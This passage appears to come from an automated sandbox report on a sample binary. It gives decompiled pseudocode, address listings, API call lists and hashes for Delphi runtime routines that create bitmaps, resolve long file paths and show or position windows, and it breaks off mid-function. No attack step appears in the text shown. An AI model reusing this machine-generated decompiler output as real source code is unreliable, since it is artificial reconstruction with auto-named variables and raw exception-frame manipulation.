                                                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                    • API String ID: 2238633743-2910565190
                                                    • Opcode ID: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                    • Instruction ID: 583b1748ec7c75dcc55376f1719c3b0464f23e6b29e7b95583f9f44409200d59
                                                    • Opcode Fuzzy Hash: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                    • Instruction Fuzzy Hash: 08A1F2B0F48660AFDB00EB67EC96B2637A8EB15704350467BB400DF696D67DA8009B5E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00429040 Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E00429040(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
				struct HBITMAP__* _v8;
				struct HPALETTE__* _v12;
				struct HPALETTE__* _v16;
				struct HPALETTE__* _v20;
				void* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				struct HDC__* _v36;
				BITMAPINFO* _v40;
				void* _v44;
				intOrPtr _v48;
				struct tagRGBQUAD _v52;
				struct HPALETTE__* _v56;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v132;
				intOrPtr _v136;
				void _v140;
				struct tagRECT _v156;
				void* __ebx;
				void* __ebp;
				signed short _t229;
				int _t281;
				signed int _t290;
				signed short _t292;
				struct HBRUSH__* _t366;
				struct HPALETTE__* _t422;
				signed int _t441;
				intOrPtr _t442;
				intOrPtr _t444;
				intOrPtr _t445;
				void* _t455;
				void* _t457;
				void* _t459;
				intOrPtr _t460;

				_t457 = _t459;
				_t460 = _t459 + 0xffffff68;
				_push(_t419);
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
						E00428BFC(_v8);
						_v116 = 0;
						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
							L00425F40();
						}
						_v28 = E00426060(GetDC(0));
						_v32 = E00426060(CreateCompatibleDC(_v28));
						_push(_t457);
						_push(0x42968e);
						_push( *[fs:edx]);
						 *[fs:edx] = _t460;
						if( *(_a8 + 0x18) >= 0x28) {
							_v40 = E0040275C(0x42c);
							_push(_t457);
							_push(0x429398);
							_push( *[fs:edx]);
							 *[fs:edx] = _t460;
							 *(_a8 + 0x18) = 0x28;
							 *((short*)(_a8 + 0x24)) = 1;
							if( *(_a8 + 0x26) == 0) {
								_t290 = GetDeviceCaps(_v28, 0xc);
								_t292 = GetDeviceCaps(_v28, 0xe);
								_t419 = _t290 * _t292;
								 *(_a8 + 0x26) = _t290 * _t292;
							}
							memcpy(_v40, _a8 + 0x18, 0xa << 2);
							 *(_a8 + 4) =  *(_a8 + 0x1c);
							_t441 = _a8;
							 *(_t441 + 8) =  *(_a8 + 0x20);
							if( *(_a8 + 0x26) > 8) {
								_t229 =  *(_a8 + 0x26);
								if(_t229 == 0x10) {
									L30:
									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
										E00428FF4(_a8);
										_t104 =  &(_v40->bmiColors); // 0x29
										_t441 = _t104;
										E004029DC(_a8 + 0x40, 0xc, _t441);
									}
								} else {
									_t441 = _a8;
									if(_t229 == 0x20) {
										goto L30;
									}
								}
							} else {
								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
									if(_v16 == 0) {
										if(_v8 != 0) {
											_v24 = SelectObject(_v32, _v8);
											if(_v116 <= 0 || _v120 == 0) {
												asm("cdq");
												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
											} else {
												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
												_t441 = _a8;
												 *(_t441 + 0x38) = _t281;
											}
											SelectObject(_v32, _v24);
										}
									} else {
										_t76 =  &(_v40->bmiColors); // 0x29
										_t441 = _t76;
										E004267F4(_v16, 0xff, _t441);
									}
								} else {
									_t441 = 0;
									_v40->bmiColors = 0;
									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
								}
							}
							_v20 = E00426060(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
							if(_v44 == 0) {
								L00425FB8(_t419);
							}
							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
								_pop(_t442);
								 *[fs:eax] = _t442;
								_push(0x42939f);
								return E0040277C(_v40);
							} else {
								asm("cdq");
								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
								E00404424();
								E00404424();
								goto L58;
							}
						} else {
							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
								_v20 = E00426060(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
							} else {
								_v20 = E00426060(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
							}
							E00426060(_v20);
							_v24 = E00426060(SelectObject(_v32, _v20));
							_push(_t457);
							_push(0x42963f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_push(_t457);
							_push(0x42962e);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_v56 = 0;
							_t422 = 0;
							if(_v16 != 0) {
								_v56 = SelectPalette(_v32, _v16, 0);
								RealizePalette(_v32);
							}
							_push(_t457);
							_push(0x42960c);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							if(_a4 == 0) {
								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
							} else {
								_t366 = E00425610( *((intOrPtr*)(_a4 + 0x14)));
								E00419804( *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
								FillRect(_v32,  &_v156, _t366);
								SetTextColor(_v32, E00424950( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
								SetBkColor(_v32, E00424950(E004255D4( *((intOrPtr*)(_a4 + 0x14)))));
								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
									_v52 = E00424950( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
									_v48 = E00424950(E004255D4( *((intOrPtr*)(_a4 + 0x14))));
									SetDIBColorTable(_v32, 0, 2,  &_v52);
								}
							}
							if(_v8 == 0) {
								_pop(_t444);
								 *[fs:eax] = _t444;
								_push(0x429613);
								if(_v16 != 0) {
									return SelectPalette(_v32, _v56, 0xffffffff);
								}
								return 0;
							} else {
								_v36 = E00426060(CreateCompatibleDC(_v28));
								_push(_t457);
								_push(0x4295e2);
								_push( *[fs:eax]);
								 *[fs:eax] = _t460;
								_t455 = E00426060(SelectObject(_v36, _v8));
								if(_v12 != 0) {
									_t422 = SelectPalette(_v36, _v12, 0);
									RealizePalette(_v36);
								}
								if(_a4 != 0) {
									SetTextColor(_v36, E00424950( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
									SetBkColor(_v36, E00424950(E004255D4( *((intOrPtr*)(_a4 + 0x14)))));
								}
								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
								if(_v12 != 0) {
									SelectPalette(_v36, _t422, 0xffffffff);
								}
								E00426060(SelectObject(_v36, _t455));
								_pop(_t445);
								 *[fs:eax] = _t445;
								_push(0x4295e9);
								return DeleteDC(_v36);
							}
						}
					} else {
						goto L58;
					}
				} else {
					L58:
					return _v20;
				}
			}






































                                                    0x00429041
                                                    0x00429043
                                                    0x00429049
                                                    0x0042904c
                                                    0x0042904f
                                                    0x00429052
                                                    0x00429057
                                                    0x00429061
                                                    0x00429084
                                                    0x004290a3
                                                    0x004290aa
                                                    0x004290b1
                                                    0x004290ca
                                                    0x004290ca
                                                    0x004290db
                                                    0x004290ec
                                                    0x004290f1
                                                    0x004290f2
                                                    0x004290f7
                                                    0x004290fa
                                                    0x00429104
                                                    0x0042916e
                                                    0x00429173
                                                    0x00429174
                                                    0x00429179
                                                    0x0042917c
                                                    0x00429182
                                                    0x0042918c
                                                    0x0042919a
                                                    0x004291a2
                                                    0x004291af
                                                    0x004291b4
                                                    0x004291bb
                                                    0x004291bb
                                                    0x004291cf
                                                    0x004291da
                                                    0x004291e3
                                                    0x004291e6
                                                    0x004291f1
                                                    0x004292c1
                                                    0x004292c9
                                                    0x004292d4
                                                    0x004292db
                                                    0x004292e0
                                                    0x004292e8
                                                    0x004292e8
                                                    0x004292f6
                                                    0x004292f6
                                                    0x004292cb
                                                    0x004292cb
                                                    0x004292d2
                                                    0x00000000
                                                    0x00000000
                                                    0x004292d2
                                                    0x004291f7
                                                    0x004291ff
                                                    0x0042922d
                                                    0x0042924b
                                                    0x0042925e
                                                    0x00429265
                                                    0x0042929a
                                                    0x004292aa
                                                    0x0042926d
                                                    0x0042927f
                                                    0x00429284
                                                    0x00429287
                                                    0x00429287
                                                    0x004292b7
                                                    0x004292b7
                                                    0x0042922f
                                                    0x00429232
                                                    0x00429232
                                                    0x0042923d
                                                    0x0042923d
                                                    0x0042920d
                                                    0x00429210
                                                    0x00429212
                                                    0x0042921e
                                                    0x0042921e
                                                    0x004291ff
                                                    0x00429317
                                                    0x0042931e
                                                    0x00429320
                                                    0x00429320
                                                    0x00429329
                                                    0x00429384
                                                    0x00429387
                                                    0x0042938a
                                                    0x00429397
                                                    0x0042934e
                                                    0x0042935e
                                                    0x0042936e
                                                    0x00429373
                                                    0x00429378
                                                    0x00000000
                                                    0x00429378
                                                    0x00429106
                                                    0x00429118
                                                    0x0042915c
                                                    0x0042911a
                                                    0x00429138
                                                    0x00429138
                                                    0x004293a2
                                                    0x004293b9
                                                    0x004293be
                                                    0x004293bf
                                                    0x004293c4
                                                    0x004293c7
                                                    0x004293cc
                                                    0x004293cd
                                                    0x004293d2
                                                    0x004293d5
                                                    0x004293da
                                                    0x004293dd
                                                    0x004293e3
                                                    0x004293f4
                                                    0x004293fb
                                                    0x004293fb
                                                    0x00429402
                                                    0x00429403
                                                    0x00429408
                                                    0x0042940b
                                                    0x00429412
                                                    0x004294e8
                                                    0x00429418
                                                    0x0042941e
                                                    0x0042943c
                                                    0x0042944c
                                                    0x00429464
                                                    0x0042947e
                                                    0x0042948b
                                                    0x004294a4
                                                    0x004294b7
                                                    0x004294c6
                                                    0x004294c6
                                                    0x0042948b
                                                    0x004294f1
                                                    0x004295eb
                                                    0x004295ee
                                                    0x004295f1
                                                    0x004295fa
                                                    0x00000000
                                                    0x00429606
                                                    0x0042960b
                                                    0x004294f7
                                                    0x00429505
                                                    0x0042950a
                                                    0x0042950b
                                                    0x00429510
                                                    0x00429513
                                                    0x00429528
                                                    0x0042952e
                                                    0x0042953f
                                                    0x00429545
                                                    0x00429545
                                                    0x0042954e
                                                    0x00429563
                                                    0x0042957d
                                                    0x0042957d
                                                    0x004295a5
                                                    0x004295ae
                                                    0x004295b7
                                                    0x004295b7
                                                    0x004295c6
                                                    0x004295cd
                                                    0x004295d0
                                                    0x004295d3
                                                    0x004295e1
                                                    0x004295e1
                                                    0x004294f1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00429695
                                                    0x00429695
                                                    0x0042969e
                                                    0x0042969e

                                                    APIs
                                                    • GetObjectA.GDI32(00000000,00000054,?), ref: 004290C0
                                                    • GetDC.USER32(00000000), ref: 004290D1
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 004290E2
                                                    • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0042912E
                                                    • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 00429152
                                                    • SelectObject.GDI32(?,?), ref: 004293AF
                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 004293EF
                                                    • RealizePalette.GDI32(?), ref: 004293FB
                                                    • SetTextColor.GDI32(?,00000000), ref: 00429464
                                                    • SetBkColor.GDI32(?,00000000), ref: 0042947E
                                                    • SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,?,?,00000000,00000000,0042960C,?,00000000,0042962E), ref: 004294C6
                                                    • FillRect.USER32 ref: 0042944C
                                                      • Part of subcall function 00424950: GetSysColor.USER32(?), ref: 0042495A
                                                    • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 004294E8
                                                    • CreateCompatibleDC.GDI32(00000028), ref: 004294FB
                                                    • SelectObject.GDI32(?,00000000), ref: 0042951E
                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 0042953A
                                                    • RealizePalette.GDI32(?), ref: 00429545
                                                    • SetTextColor.GDI32(?,00000000), ref: 00429563
                                                    • SetBkColor.GDI32(?,00000000), ref: 0042957D
                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004295A5
                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 004295B7
                                                    • SelectObject.GDI32(?,00000000), ref: 004295C1
                                                    • DeleteDC.GDI32(?), ref: 004295DC
                                                      • Part of subcall function 00425610: CreateBrushIndirect.GDI32(?), ref: 004256BA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                    • String ID:
                                                    • API String ID: 1299887459-0
                                                    • Opcode ID: 519235494466fc4cf2ec32487541d526bf075bba547cee6414a3c64769236d7f
                                                    • Instruction ID: 7759fe5d4c3796b98261a3e37b615e13e57611603d3437bbdafc9af0f78bd738
                                                    • Opcode Fuzzy Hash: 519235494466fc4cf2ec32487541d526bf075bba547cee6414a3c64769236d7f
                                                    • Instruction Fuzzy Hash: 5A120E71A00218AFDB10DF99D985F9EB7F8EB08314F51845AF918EB291C778ED40CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406018 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E00406018(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00406004(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00406004(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L0040131C();
									while( *_t93 != 0) {
										_t90 = E00406004(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L0040131C();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401324();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L0040131C();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401324();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L0040131C();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L0040131C();
						}
					}
				}
				L17:
				return _v16;
			}



















                                                    0x00406024
                                                    0x00406027
                                                    0x0040602d
                                                    0x0040603a
                                                    0x0040603e
                                                    0x00406080
                                                    0x00406086
                                                    0x004060c3
                                                    0x00000000
                                                    0x00406088
                                                    0x0040608f
                                                    0x004060a0
                                                    0x004060a5
                                                    0x004060ab
                                                    0x004060b3
                                                    0x004060b8
                                                    0x004060c6
                                                    0x004060c8
                                                    0x004060ce
                                                    0x004060d2
                                                    0x004060d9
                                                    0x004060da
                                                    0x00406185
                                                    0x004060ec
                                                    0x004060f0
                                                    0x004060fd
                                                    0x00406104
                                                    0x00406105
                                                    0x0040610e
                                                    0x0040610f
                                                    0x00406127
                                                    0x0040612c
                                                    0x0040612f
                                                    0x00406134
                                                    0x0040613a
                                                    0x0040613b
                                                    0x0040614b
                                                    0x0040614d
                                                    0x0040615d
                                                    0x00406164
                                                    0x0040616e
                                                    0x0040616f
                                                    0x00406174
                                                    0x0040617a
                                                    0x0040617b
                                                    0x00406181
                                                    0x00406183
                                                    0x00000000
                                                    0x00406183
                                                    0x0040614b
                                                    0x0040612c
                                                    0x00000000
                                                    0x004060fd
                                                    0x00406191
                                                    0x00406198
                                                    0x0040619c
                                                    0x0040619d
                                                    0x0040619d
                                                    0x004060b8
                                                    0x004060a5
                                                    0x0040608f
                                                    0x00406040
                                                    0x0040604b
                                                    0x0040604f
                                                    0x00000000
                                                    0x00406051
                                                    0x00406051
                                                    0x0040605c
                                                    0x00406060
                                                    0x00406065
                                                    0x00000000
                                                    0x00406067
                                                    0x0040606a
                                                    0x00406071
                                                    0x00406075
                                                    0x00406076
                                                    0x00406076
                                                    0x00406065
                                                    0x0040604f
                                                    0x004061a2
                                                    0x004061ab

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
                                                    • lstrcpyn.KERNEL32(?,?,?,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
                                                    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
                                                    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5), ref: 00406122
                                                    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000), ref: 0040612F
                                                    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278), ref: 0040613B
                                                    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
                                                    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
                                                    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                    • API String ID: 3245196872-1565342463
                                                    • Opcode ID: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                    • Instruction ID: 0b7a158813eaac7eeaad4be5227783dc720e21281ab2719b2f6a7295f4a4c489
                                                    • Opcode Fuzzy Hash: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                    • Instruction Fuzzy Hash: B341A272900158AFEB10DBA9CC85BDEB3EDDF44304F1501B7E94AF7282D6389E548B58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045695C Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 407windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E0045695C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				void* _t323;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x456ec6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
					_t294 =  *0x49de28; // 0x422f40
					E00406A70(_t294,  &_v12);
					E0040D144(_v12, 1);
					E00404378();
				}
				_t149 =  *0x49ebb8; // 0x0
				E0045B100(_t149);
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
				_push(_t372);
				_push(0x456ea9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x456db0);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						L00403DE8(_v8, __eflags);
						_pop(_t323);
						 *[fs:eax] = 0;
						_t160 =  *0x49ebbc; // 0x0
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							L00455B08(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E00441704(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E00441704(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E00451750(E00441704(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E00441704(_v8), 0);
								} else {
									SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0043EC5C(_v8, _t323);
						}
					} else {
						_push(_t372);
						_push(0x456a14);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						L00403DE8(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E004581F4() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E004581E8() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x49ebb8; // 0x0
								_t305 = E0043A980( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x49ebb8; // 0x0
								_t248 = E0043A9C4( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E00454DB8(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E00458224() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E00458218() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x49ebb8; // 0x0
										_t311 = E0043A980( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x49ebb8; // 0x0
										_t269 = E0043A9C4( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x49ebb8; // 0x0
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44ff0c; // 0x44ff58
									_t290 = L00403D78( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E004581F4() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E004581E8() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
